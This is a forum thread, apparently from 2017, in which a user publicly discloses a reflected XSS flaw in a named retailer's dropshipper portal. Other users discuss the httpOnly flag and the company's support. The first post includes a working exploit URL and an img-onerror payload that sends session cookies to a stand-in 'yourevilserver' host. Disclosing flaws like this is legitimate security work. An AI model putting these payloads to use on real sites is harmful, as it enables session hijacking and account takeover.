DX  » Community » Forums
«See all threads (in Site Bug Reports)
Site Bug Reports

Security vulnerability dss.dx.com

  • xordnance Wednesday, November 08, 2017 6:26 PM Reply

    Hi there,

    I've discovered a vulnerability in the management portal for dropshippers. It allows an attacker to log in as a victim using dss.dx.com by having the victim click a malicious link.

    I contacted your service center via a ticket, and although I indicated that posting this on the forum might be dangerous, they have assured me that this is the preferred way to communicate this issue.

    There is an XSS  (Cross Site Scripting) in the 'batch list' page of the dss.dx.com domain. The danger is greatly increased by the cookie not having an 'httpOnly' flag, allowing it to be read by the injected code.
    To reproduce this issue, log in to the dss.dx.com domain, visit the link below, and go through the CloudFlare CAPTCHA.


    http://dss.dx.com/batch/queryBatch.action?startDate=&endDate=&batchName="><script>alert(document.cookie)</script>


    You will be greeted by alerts containing the cookie, showing the JavaScript. in the URL has access to the dx.com session information.
    The cookie can be stolen by changing the JavaScript. from an alert to something like this:

    "><img src=x 0nerror=this.src='http://yourevilserver/?c='+document.cookie>

    This will make the cookie show up in the logs of the remote server, allowing an attacker to use it.

    This cookie contains values like 'sessionCookie' and 'DXSSO', leading me to believe that when stolen, these tokens can be used to hijack sessions and log in as the tokens owner.
    This can lead to situations where an attacker places a bulk order in a victims name.

    If there is anything else i can do to help resolve this issue, please let me know.

    Kind regards,

    xordnance

    Posts(11) | Reviews | Tip post

    post edited by xordnance on 11/8/2017 at 6:41 PM
  • sheepish Top 10 Forum Poster Wednesday, November 08, 2017 6:38 PM Reply

    The danger is greatly increased by the cookie not having an 'httpOnly' flag


    Do you mean httpsOnly?


    To reproduce this issue, log in to the dss.sx.com domain


    That should probably be dx.

    DX has found a new way to deceive customers:
    Use reviews for different products that have not been bought
    by the person who wrote the review.
    http://club.dx.com/forums/forums.dx/threadid.1462252
    Posts(23695) | Reviews | Tip post

  • xordnance Wednesday, November 08, 2017 6:43 PM Reply

    Yeah sx should be dx, I edited that.

    'httpOnly' is correct. This makes sure it can not be accessed by JavaScript. For making sure it is sent over HTTPS, there is the 'secure' flag.

    Posts(11) | Reviews | Tip post

  • sheepish Top 10 Forum Poster Wednesday, November 08, 2017 6:47 PM Reply

    Ah, http rather than anything else, not insecure vs secure. Thanks for posting this, and for the clarification. I'm glad I don't dropship.

    DX has found a new way to deceive customers:
    Use reviews for different products that have not been bought
    by the person who wrote the review.
    http://club.dx.com/forums/forums.dx/threadid.1462252
    Posts(23695) | Reviews | Tip post

  • xordnance Friday, November 10, 2017 7:23 PM Reply

    Thanks :)


    I wanted to start dropshipping, but this vulnerability has made me apprehensive enough to hold off on being logged into the dss.dx.com management portal.




    Posts(11) | Reviews | Tip post

    post edited by xordnance on 11/10/2017 at 7:38 PM
  • xordnance Friday, November 10, 2017 7:37 PM Reply

    I read in some other thread that @Happyvicky is a staff member that might be able to handle security vulnerabilities?  It sais in her signature that she is on maternity leave. @Maye_Tao could you please assist me in resolving this issue?

    (Not to be impolite but I really shouldn't have to search this hard for a staff contact)

    Posts(11) | Reviews | Tip post

  • gasbag11 Top 10 Forum Poster Friday, November 10, 2017 9:00 PM Reply

    Sadly, Happyvicky never returned to work here, but Maye_Tao has taken over and has done an excellent job.  :)


    (Not to be impolite but I really shouldn't have to search this hard for a staff contact)


    I agree, but DX just hates admitting anything could be wrong with their site, and pretend they didn't see all the threads about various problems/site bugs here.

    ALWAYS ask questions about a specific item on its
    page. Scroll down and click on "Post a new topic".
    Posts(11595) | Reviews | Tip post

  • xordnance Friday, November 10, 2017 9:24 PM Reply

    Hey gasbag11, thank you for your reply! I'm glad there are people interested in this and am looking forward to being contacted by IT staff.


    I agree, but DX just hates admitting anything could be wrong with their site, and pretend they didn't see all the threads about various problems/site bugs here.

        
    As Ayn Rand eloquently said: 'You can always avoid reality. But you can never avoid the consequences of avoiding reality'

    If it were just a bug breaking some functionaity, I couldn't care less. That would not be dangerous, just annoying.
    But I've tested the vulnerability and it allows me to hijack a session and log in as my other test user. I'm very surprised that they've asked me to post the details on a public forum.



    Posts(11) | Reviews | Tip post

  • gasbag11 Top 10 Forum Poster Friday, November 10, 2017 10:29 PM Reply

    Most likely that CS didn't understand/comprehend the importance of your warning, and said to post here as they often do when they don't understand things. 


    I know nothing about anything you've said, but you might want to think about editing/removing anything in your previous posts which would make it easy for someone with a little more knowledge to do.


    You can give the details back to DX through a PM or a ticket once Maye_Tao replies. 


    ALWAYS ask questions about a specific item on its
    page. Scroll down and click on "Post a new topic".
    Posts(11595) | Reviews | Tip post

  • xordnance Friday, November 10, 2017 10:58 PM Reply

    Yeah probably... 

    After their first reply was  to post it here, I explained it could be used to compromise accounts, explicitly asked for a private contact and asked to double-check with management before confirming it should be posted on the forum. After that it was reiterated it should be posted here. 

    So I did do my very best to have them understand the implications. If a staff member asks me to remove the info, I definitely will. 

    Posts(11) | Reviews | Tip post

Page 1 of 3
Go to Page:
«Reply to this thread (in Site Bug Reports)
Site Bug Reports

Reply

Subject:

* 50 characters max

Message:

Please note: HTML codes are not allowed anywhere on this page (otherwise you will see an error).

Please note that DealExtreme Forums are not a sales or product support board. While we do constantly participate in this forum, please contact us via support ticket for a guaranteed fast response. We make every effort to make the quickest replies.

DX Everywhere